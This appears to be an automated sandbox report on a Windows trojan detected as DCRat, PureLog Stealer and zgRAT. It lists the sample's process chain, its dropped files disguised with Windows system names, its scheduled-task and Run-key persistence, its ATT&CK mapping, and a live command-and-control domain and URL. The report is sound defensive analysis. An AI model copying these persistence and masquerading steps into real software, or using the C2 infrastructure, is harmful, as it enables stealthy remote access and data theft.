                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_00448EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00448EBD
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe "C:\ComproviderComponentIntocommon/Portsessionsvc.exe"Jump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"Jump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe" Jump to behavior
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043F654 cpuid 0_2_0043F654
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0043AF0F
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeQueries volume information: C:\ComproviderComponentIntocommon\Portsessionsvc.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeQueries volume information: C:\ComproviderComponentIntocommon\ctfmon.exe VolumeInformation
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeQueries volume information: C:\ComproviderComponentIntocommon\ctfmon.exe VolumeInformation
                                    Source: C:\Recovery\dwm.exeQueries volume information: C:\Recovery\dwm.exe VolumeInformation
                                    Source: C:\Recovery\dwm.exeQueries volume information: C:\Recovery\dwm.exe VolumeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeQueries volume information: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe VolumeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeQueries volume information: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe VolumeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeQueries volume information: C:\ComproviderComponentIntocommon\Portsessionsvc.exe VolumeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeQueries volume information: C:\ComproviderComponentIntocommon\Portsessionsvc.exe VolumeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeQueries volume information: C:\Windows\Resources\Themes\smartscreen.exe VolumeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeQueries volume information: C:\Windows\Resources\Themes\smartscreen.exe VolumeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeQueries volume information: C:\Windows\Resources\Themes\smartscreen.exe VolumeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeQueries volume information: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0043DF1E
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042B146 GetVersionExW,0_2_0042B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Portsessionsvc.exe PID: 8076, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: iEIWJugOSvvEyboGDFYpQ.exe PID: 7820, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: smartscreen.exe PID: 1028, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.5300705.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Portsessionsvc.exe PID: 8076, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: iEIWJugOSvvEyboGDFYpQ.exe PID: 7820, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: smartscreen.exe PID: 1028, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.5300705.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		OS Credential Dumping1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		11
                                    Archive Collected Data                                    		2
                                    Ingress Tool Transfer                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		11
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop ProtocolData from Removable Media1
                                    Encrypted Channel                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager37
                                    System Information Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive3
                                    Non-Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCron31
                                    Registry Run Keys / Startup Folder                                    		31
                                    Registry Run Keys / Startup Folder                                    		13
                                    Software Packing                                    		NTDS121
                                    Security Software Discovery                                    		Distributed Component Object ModelInput Capture13
                                    Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets1
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion                                    		Cached Domain Credentials41
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items231
                                    Masquerading                                    		DCSync1
                                    Remote System Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                                    Virtualization/Sandbox Evasion                                    		Proc Filesystem1
                                    System Network Configuration Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581773 Sample: EjS7Q5fFCE.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 79 001031cm.nyashteam.ru 2->79 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 Antivirus detection for URL or domain 2->95 97 17 other signatures 2->97 11 EjS7Q5fFCE.exe 3 6 2->11         started        14 ctfmon.exe 2->14         started        17 dwm.exe 2->17         started        19 9 other processes 2->19 signatures3 process4 dnsIp5 71 C:\...\Portsessionsvc.exe, PE32 11->71 dropped 73 9ILuIMngNdMuzngHHM...TDwm0yZ13RpFsRY.vbe, data 11->73 dropped 22 wscript.exe 1 11->22         started        107 Antivirus detection for dropped file 14->107 109 Multi AV Scanner detection for dropped file 14->109 111 Machine Learning detection for dropped file 14->111 81 001031cm.nyashteam.ru 172.67.186.200, 49736, 49737, 49739 CLOUDFLARENETUS United States 19->81 75 C:\Users\user\Desktop\etRRuFlx.log, PE32 19->75 dropped 77 C:\Users\user\AppData\...\Ycxw1CWDXu.bat, DOS 19->77 dropped 25 cmd.exe 19->25         started        file6 signatures7 process8 signatures9 99 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->99 27 cmd.exe 1 22->27         started        29 conhost.exe 25->29         started        31 chcp.com 25->31         started        process10 process11 33 Portsessionsvc.exe 11 24 27->33         started        37 conhost.exe 27->37         started        file12 61 C:\Windows\Resources\Themes\smartscreen.exe, PE32 33->61 dropped 63 C:\Users\user\Desktop\kwWqKlvO.log, PE32 33->63 dropped 65 C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe, PE32 33->65 dropped 67 5 other malicious files 33->67 dropped 83 Antivirus detection for dropped file 33->83 85 Multi AV Scanner detection for dropped file 33->85 87 Creates an undocumented autostart registry key 33->87 89 6 other signatures 33->89 39 cmd.exe 1 33->39         started        42 csc.exe 4 33->42         started        45 schtasks.exe 33->45         started        47 17 other processes 33->47 signatures13 process14 file15 101 Uses ping.exe to sleep 39->101 103 Uses ping.exe to check the status of other devices and networks 39->103 49 conhost.exe 39->49         started        51 chcp.com 39->51         started        53 PING.EXE 39->53         started        55 iEIWJugOSvvEyboGDFYpQ.exe 39->55         started        69 C:\Windows\...\SecurityHealthSystray.exe, PE32 42->69 dropped 105 Infects executable files (exe, dll, sys, html) 42->105 57 conhost.exe 42->57         started        59 cvtres.exe 1 42->59         started        signatures16 process17

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    EjS7Q5fFCE.exe62%ReversingLabsWin32.Trojan.Uztuby
                                    EjS7Q5fFCE.exe100%AviraVBS/Runner.VPG
                                    EjS7Q5fFCE.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat100%AviraBAT/Delbat.C
                                    C:\Recovery\dwm.exe100%AviraHEUR/AGEN.1323342
                                    C:\Windows\Resources\Themes\smartscreen.exe100%AviraHEUR/AGEN.1323342
                                    C:\ComproviderComponentIntocommon\ctfmon.exe100%AviraHEUR/AGEN.1323342
                                    C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe100%AviraVBS/Runner.VPG
                                    C:\ComproviderComponentIntocommon\Portsessionsvc.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\dwm.exe100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Windows\Resources\Themes\smartscreen.exe100%Joe Sandbox ML
                                    C:\ComproviderComponentIntocommon\ctfmon.exe100%Joe Sandbox ML
                                    C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe100%Joe Sandbox ML
                                    C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe100%Joe Sandbox ML
                                    C:\ComproviderComponentIntocommon\Portsessionsvc.exe100%Joe Sandbox ML
                                    C:\ComproviderComponentIntocommon\Portsessionsvc.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ComproviderComponentIntocommon\ctfmon.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\dwm.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\etRRuFlx.log25%ReversingLabs
                                    C:\Users\user\Desktop\kwWqKlvO.log25%ReversingLabs
                                    C:\Windows\Resources\Themes\smartscreen.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://www.w3.0%Avira URL Cloudsafe
                                    http://001031cm.nyashteam.ru/100%Avira URL Cloudmalware
                                    http://001031cm.nyashteam.ru100%Avira URL Cloudmalware
                                    http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.php100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    001031cm.nyashteam.ru
                                    		172.67.186.200
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://001031cm.nyashteam.ru/smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.w3.dwm.exe, 00000024.00000002.2180283399.0000000002C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://001031cm.nyashteam.rusmartscreen.exe, 0000002A.00000002.2137127393.0000000003296000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePortsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, smartscreen.exe, 0000002A.00000002.2137127393.00000000030C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        172.67.186.200
                                        		001031cm.nyashteam.ruUnited States
                                        		13335CLOUDFLARENETUStrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1581773
                                        Start date and time:2024-12-28 23:46:15 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 40s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:58
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:EjS7Q5fFCE.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:5fa3d2d795206f9981b7bd191c423d65.exe
                                        Detection:MAL
                                        Classification:mal100.spre.troj.expl.evad.winEXE@59/32@1/1
                                        EGA Information:
                                        • Successful, ratio: 14.3%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target Portsessionsvc.exe, PID 3412 because it is empty
                                        • Execution Graph export aborted for target Portsessionsvc.exe, PID 7864 because it is empty
                                        • Execution Graph export aborted for target ctfmon.exe, PID 5980 because it is empty
                                        • Execution Graph export aborted for target ctfmon.exe, PID 980 because it is empty
                                        • Execution Graph export aborted for target dwm.exe, PID 1220 because it is empty
                                        • Execution Graph export aborted for target dwm.exe, PID 1780 because it is empty
                                        • Execution Graph export aborted for target iEIWJugOSvvEyboGDFYpQ.exe, PID 2120 because it is empty
                                        • Execution Graph export aborted for target iEIWJugOSvvEyboGDFYpQ.exe, PID 6864 because it is empty
                                        • Execution Graph export aborted for target iEIWJugOSvvEyboGDFYpQ.exe, PID 7820 because it is empty
                                        • Execution Graph export aborted for target smartscreen.exe, PID 1028 because it is empty
                                        • Execution Graph export aborted for target smartscreen.exe, PID 2828 because it is empty
                                        • Execution Graph export aborted for target smartscreen.exe, PID 6348 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: EjS7Q5fFCE.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:47:50API Interceptor1x Sleep call for process: smartscreen.exe modified
                                        22:47:39Task SchedulerRun new task: ctfmon path: "C:\ComproviderComponentIntocommon\ctfmon.exe"
                                        22:47:39Task SchedulerRun new task: ctfmonc path: "C:\ComproviderComponentIntocommon\ctfmon.exe"
                                        22:47:40Task SchedulerRun new task: dwm path: "C:\Recovery\dwm.exe"
                                        22:47:40Task SchedulerRun new task: dwmd path: "C:\Recovery\dwm.exe"
                                        22:47:40Task SchedulerRun new task: iEIWJugOSvvEyboGDFYpQ path: "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                        22:47:40Task SchedulerRun new task: iEIWJugOSvvEyboGDFYpQi path: "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                        22:47:40Task SchedulerRun new task: Portsessionsvc path: "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
                                        22:47:40Task SchedulerRun new task: PortsessionsvcP path: "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
                                        22:47:40Task SchedulerRun new task: smartscreen path: "C:\Windows\Resources\Themes\smartscreen.exe"
                                        22:47:40Task SchedulerRun new task: smartscreens path: "C:\Windows\Resources\Themes\smartscreen.exe"
                                        22:47:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Windows\Resources\Themes\smartscreen.exe"
                                        22:47:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Recovery\dwm.exe"
                                        22:47:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQ "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                        22:48:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ComproviderComponentIntocommon\ctfmon.exe"
                                        22:48:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Portsessionsvc "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
                                        22:48:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Windows\Resources\Themes\smartscreen.exe"
                                        22:48:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Recovery\dwm.exe"
                                        22:48:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQ "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                        22:48:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ComproviderComponentIntocommon\ctfmon.exe"
                                        22:48:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Portsessionsvc "C:\ComproviderComponentIntocommon\Portsessionsvc.exe"
                                        22:49:06AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Windows\Resources\Themes\smartscreen.exe"
                                        22:49:14AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Recovery\dwm.exe"

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        172.67.186.2006G8OR42xrB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 895157cm.nyashteam.ru/videogeoflowertestuniversaldleLocalCentral.php
